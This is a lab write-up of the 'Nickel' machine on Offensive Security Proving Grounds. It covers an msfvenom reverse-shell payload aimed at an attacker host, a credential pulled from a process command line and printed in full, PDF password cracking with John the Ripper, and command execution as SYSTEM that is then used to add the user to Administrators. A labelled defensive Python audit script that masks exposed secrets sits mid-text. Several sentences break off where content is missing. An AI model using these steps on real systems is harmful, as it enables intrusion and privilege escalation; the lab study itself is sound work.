Writeup for Nickel from Offensive Security Proving Grounds (PG)
nmapAutomator.sh -H 192.168.90.99 -t full
nmapAutomator.sh -H 192.168.90.99 -t vulns
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.90 LPORT=443 EXITFUNC=thread -f python
On port 8089, we have a dashboard:
Each of the links brings us to 169.254.109.39:33333. By going to 192.168.90.99:33333 instead, we get a Not Found response for
We get a different message, however, for
If we send a POST request instead, we indeed see a list of running processes!
In the command line of one of the processes, we get a user's credentials.
-p parameter into CyberChef, we can see that it is a Base64-encoded password (
Using the credentials ariah:NowiseSloopTheory139, we can SSH into the server.
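The credentials above were found because a password was passed on a process command line, readable by anyone who can list processes. As an added defender-side check, not part of the original writeup, the following Python audit scans a process listing for secret-bearing arguments and reports them masked, also noting when the value is merely Base64-encoded (an encoding, not protection). The listing, program names and secret values are constructed placeholders.

```python
import base64
import binascii
import re
import shlex

# Flags that commonly carry a secret as the next argument, plus key=value forms.
SECRET_FLAGS = {"-p", "-pw", "--password", "--pass", "--token", "--secret"}
SECRET_KV = re.compile(r"^(password|passwd|pwd|token|secret)=(.+)$", re.IGNORECASE)


def looks_base64(value):
    """True if value is strict Base64 that decodes to something non-empty."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return len(raw) > 0 and base64.b64encode(raw).decode() == value


def mask(value):
    """Keep only the first character and the length so the report never re-exposes the secret."""
    return value[:1] + "*" * (len(value) - 1)


def find_exposed_credentials(process_lines):
    """process_lines: 'pid<TAB>user<TAB>command line' strings, as a process listing shows them.
    Returns one finding per secret-bearing argument, with the secret value masked."""
    findings = []
    for line in process_lines:
        pid, user, cmdline = line.split("\t", 2)
        try:
            argv = shlex.split(cmdline, posix=False)  # non-POSIX mode keeps Windows paths intact
        except ValueError:
            argv = cmdline.split()
        for i, arg in enumerate(argv):
            kv = SECRET_KV.match(arg)
            if arg in SECRET_FLAGS and i + 1 < len(argv):
                flag, value = arg, argv[i + 1]
            elif kv:
                flag, value = kv.group(1).lower() + "=", kv.group(2)
            else:
                continue
            findings.append({"pid": int(pid), "user": user, "program": argv[0].strip('"'),
                             "flag": flag, "masked": mask(value), "base64": looks_base64(value)})
    return findings


# Constructed sample listing (not from the target machine); the secrets are placeholder strings.
SAMPLE = [
    "412\tSYSTEM\tC:\\Windows\\System32\\svchost.exe -k netsvcs",
    "2108\tsvc_example\t\"C:\\Program Files\\ExampleTool\\agent.exe\" -u svc_example -p c2VjcmV0LXBsYWNlaG9sZGVy",
    "2990\tsvc_example\tpython.exe sync.py --host db01 password=hunter2",
]

if __name__ == "__main__":
    for finding in find_exposed_credentials(SAMPLE):
        print(finding)
```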
Using the previously found credentials for ariah, we can access the FTP service and download a PDF file.
However, a password is required. The previously found password does not work.
Use pdf2john.pl to extract the hash.
perl john-bleeding-jumbo/run/pdf2john.pl Infrastructure.pdf > Infrastructure-Hash.txt
Use John the Ripper to crack the hash.
john --wordlist=/usr/share/wordlists/rockyou.txt Infrastructure-Hash.txt
The password is
Here, we find a 'Temporary Command endpoint' at http://nickel/ that is only accessible through the remote machine.
Using Powershell, we can send a GET request to the API endpoint.
$Resp = Invoke-WebRequest 'http://nickel/?whoami' -UseBasicParsing
whoami, and we can see the output below.
We have RCE as SYSTEM. However, any outgoing traffic is blocked, so we cannot spawn a second reverse shell as SYSTEM. Let's do the next best thing: adding ourselves to the Administrators group.
net localgroup Administrators ariah /add
If we check the Administrators group again (net localgroup Administrators), we can see that our user
Now, we can RDP into the machine and run the command prompt as Administrator.